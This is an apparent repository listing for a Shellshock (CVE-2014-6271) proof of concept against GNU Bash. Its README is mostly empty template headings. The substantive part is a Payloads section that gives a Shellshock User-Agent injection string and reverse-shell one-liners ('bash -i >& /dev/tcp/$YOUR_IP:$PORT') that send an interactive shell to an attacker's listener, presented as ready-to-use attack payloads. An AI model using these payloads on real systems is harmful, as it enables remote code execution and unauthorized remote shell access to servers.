CVE-2014-6271 PoC — GNU Bash 远程代码执行漏洞

Source

Associated Vulnerability

Description

*CVE-2014-6271* Unix Arbitrary Code Execution Exploit commonly know as Shell Shock. Examples, Docs, Incident Response and Vulnerability/Risk Assessment, and Additional Resources may be dumped here. Enjoy :)  --- somhmxxghoul  ---

Readme

# **Shell Shock**
***Author(s)**: *ghoul@omhm.org*
***Maintainer(s)**: **
***Department**: *DevOps*
***License(s)**: **


## Overview 
***Shell Shock***: Privelege Escalation, Remote Code Execution
Family of bugs in the Unix Bash Shell. Allow execution of arbitrary commands. 


### Exploitation Vectors
* ****
#### *Payloads*
* shellshock user agent = User-Agent: () { :; } ; <$BASH_COMMAND>	
* rshell payload = bash -i >& /dev/tcp/127.0.0.1
	- rshell redirect to listener = bash -i >& /dev/tcp/$YOUR_IP:$PORT
	
#### Tricks
* 
## **Design**:
* *Purpose*: 
* *Contents*:
* *Server(s)*:
	* *Application*:
	* *Database*:
* *Networking*:
	* *DNS*: 
	* *Routes*: 
* *Application Dependencies*:
* *Dependant Programs*:



## **Basic Usage**:
* *Usage*:
* *Common Use Cases*:

* *Examples*:

## *Testing*
### *Test Input*
* *Parameters*:
* *Actions*:

### Test Output
* *Output*:
* *Screenshots*:
* *Video*:
* *Etc*:

## Notes:* *[option]*: 

File Snapshot

 [4.0K]  /data/pocs/051b292033f8dc8fcb08e3fe6d2aba4780949619
└── [ 935]  README.md

0 directories, 1 file

Remarks